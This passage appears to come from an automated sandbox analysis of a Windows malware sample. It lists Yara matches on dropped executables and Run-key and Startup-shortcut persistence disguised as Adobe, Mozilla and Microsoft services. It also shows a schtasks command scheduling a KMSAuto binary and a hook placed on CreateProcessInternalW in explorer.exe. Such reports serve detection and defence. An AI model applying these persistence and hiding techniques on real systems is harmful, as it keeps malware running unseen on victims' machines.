                      Source: Yara matchFile source: 0000000E.00000002.2095704106.0000000002A98000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000000.1898904976.00000000006F2000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.3152328073.0000000002801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2095704106.000000000294D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000000.1865951347.0000000000192000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 4336.tmp.Server.exe PID: 5720, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 476D.tmp.Server.exe PID: 420, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 5087.tmp.update.exe PID: 7408, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7952, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, type: DROPPED
                      Source: Yara matchFile source: 19.0.5E16.tmp.aaa.exe.620000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000013.00000000.1935087181.0000000000622000.00000002.00000001.01000000.00000017.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 5E16.tmp.aaa.exe PID: 7640, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe, type: DROPPED
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Service_com.adobe.dunamisJump to behavior
                      Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WpnUserService
                      Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svchost
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ACCC ToolsJump to behavior
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Service_MozillaJump to behavior
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Service_SkypeJump to behavior
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OneDriveJump to behavior
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Service_MicrosoftJump to behavior
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Service_{B955B2CC07A01546086603}
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Service_AdobeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks.exe" /create /tn ACCC Tools /tr "C:\ProgramData\KMSAuto\accc.exe" /st 07:32 /du 23:59 /sc daily /ri 1 /f
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Service_Adobe.exe.lnkJump to behavior
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Service_Adobe.exe.lnkJump to behavior
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Service_com.adobe.dunamis.exe.lnkJump to behavior
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Service_Microsoft.exe.lnkJump to behavior
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Service_Mozilla.exe.lnkJump to behavior
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Service_Skype.exe.lnkJump to behavior
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\psvhost.exe.lnkJump to behavior
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Service_{B955B2CC07A01546086603}.exe.lnk
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Service_AdobeJump to behavior
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Service_AdobeJump to behavior
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Service_com.adobe.dunamisJump to behavior
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Service_com.adobe.dunamisJump to behavior
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Service_MicrosoftJump to behavior
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Service_MicrosoftJump to behavior
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Service_MozillaJump to behavior
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Service_MozillaJump to behavior
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Service_SkypeJump to behavior
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Service_SkypeJump to behavior
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OneDriveJump to behavior
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OneDriveJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ACCC ToolsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ACCC ToolsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svchost
                      Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svchost
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Service_{B955B2CC07A01546086603}
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Service_{B955B2CC07A01546086603}
                      Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WpnUserService
                      Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WpnUserService

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: explorer.exeUser mode code has changed: module: KERNEL32.DLL function: CreateProcessInternalW new code: 0xE9 0x90 0x00 0x07 0x75 0x5B
                      Source: C:\Windows\explorer.exeCode function: 2_2_0F3C2854 LoadLibraryA,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_0F3C2854
                      Source: C:\Users\user\AppData\Roaming\svchost.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\DFDC08F28FCAA4CBE8BA 7FD48AC68F182E0CED2ACE00B223FA1D35BD8A20D75600B5400267CD5DB5CC84
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeProcess information set: NOOPENFILEERRORBOX
